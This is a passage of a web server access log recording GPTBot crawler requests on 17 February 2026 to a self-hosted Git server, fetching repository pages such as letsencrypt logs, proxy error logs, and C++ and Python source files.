192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.7" -[17/Feb/2026:16:16:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.1?display=source" [Client 74.7.227.38] [Length 33606] [Gzip 6.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.1" -[17/Feb/2026:16:16:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.2?display=source" [Client 74.7.227.38] [Length 31298] [Gzip 6.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.2" -[17/Feb/2026:16:16:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.5?display=source" [Client 74.7.227.38] [Length 33410] [Gzip 6.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.5" -[17/Feb/2026:16:16:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.5?display=source" [Client 74.7.227.38] [Length 33441] [Gzip 6.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.5" -[17/Feb/2026:16:16:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.7?display=source" [Client 74.7.227.38] [Length 10940] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.7" -[17/Feb/2026:16:16:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.6?display=source" [Client 74.7.227.38] [Length 35841] [Gzip 6.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.6" -[17/Feb/2026:16:16:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.3?display=source" [Client 74.7.227.38] [Length 38734] [Gzip 6.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.3" -[17/Feb/2026:16:16:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.6?display=source" [Client 74.7.227.38] [Length 35812] [Gzip 6.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.6" -[17/Feb/2026:16:16:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.3?display=source" [Client 74.7.227.38] [Length 38763] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.3" -[17/Feb/2026:16:16:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/metadata.json?display=rendered" [Client 74.7.227.38] [Length 11080] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/metadata.json" -[17/Feb/2026:16:16:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/import_csv.py?display=rendered" [Client 74.7.227.38] [Length 10973] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/import_csv.py" -[17/Feb/2026:16:16:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/lib64?follow_symlink=1" [Client 74.7.227.38] [Length 11045] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv" -[17/Feb/2026:16:16:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fENV_SETUP_GUIDE.md" [Client 74.7.227.38] [Length 30674] [Gzip 7.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/ENV_SETUP_GUIDE.md" -[17/Feb/2026:16:16:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 12553] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument" -[17/Feb/2026:16:16:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/global.json?display=source" [Client 74.7.227.38] [Length 11109] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/global.json" -[17/Feb/2026:16:16:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/global.json?display=rendered" [Client 74.7.227.38] [Length 10890] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/global.json" -[17/Feb/2026:16:16:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py?display=source" [Client 74.7.227.38] [Length 16647] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py" -[17/Feb/2026:16:16:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_error.log?display=source" [Client 74.7.227.38] [Length 10938] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_error.log" -[17/Feb/2026:16:16:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.1?display=source" [Client 74.7.227.38] [Length 33636] [Gzip 6.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.1" -[17/Feb/2026:16:16:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_error.log?display=source" [Client 74.7.227.38] [Length 11401] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_error.log" -[17/Feb/2026:16:16:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.4?display=source" [Client 74.7.227.38] [Length 23732] [Gzip 5.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.4" -[17/Feb/2026:16:16:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.3?display=source" [Client 74.7.227.38] [Length 38765] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.3" -[17/Feb/2026:16:16:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.6?display=source" [Client 74.7.227.38] [Length 35844] [Gzip 6.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.6" -[17/Feb/2026:16:16:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.7?display=source" [Client 74.7.227.38] [Length 10971] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.7" -[17/Feb/2026:16:16:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 2167] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" -[17/Feb/2026:16:16:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.5?display=source" [Client 74.7.227.38] [Length 33444] [Gzip 6.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.5" -[17/Feb/2026:16:16:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.2?display=source" [Client 74.7.227.38] [Length 31301] [Gzip 6.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.2" -[17/Feb/2026:16:16:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_error.log?display=source" [Client 74.7.227.38] [Length 11367] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_error.log" -[17/Feb/2026:16:17:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_error.log?display=source" [Client 74.7.227.38] [Length 11401] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_error.log" -[17/Feb/2026:16:17:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12786] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:17:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 15352] [Gzip 5.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:17:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13520] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:17:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 15351] [Gzip 5.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:17:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 15355] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:17:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12785] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:17:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12788] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:17:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13518] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:17:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13519] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:17:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 25098] [Gzip 11.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" -[17/Feb/2026:16:17:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 14779] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" -[17/Feb/2026:16:17:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 1379] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:16:17:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 3273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:16:17:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 2227] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:16:17:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 3273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:16:17:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 3273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:16:17:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 1379] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:16:17:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 1379] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:16:17:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 2227] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:16:17:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13442] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:16:17:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 30899] [Gzip 16.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_error.log" -[17/Feb/2026:16:17:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr 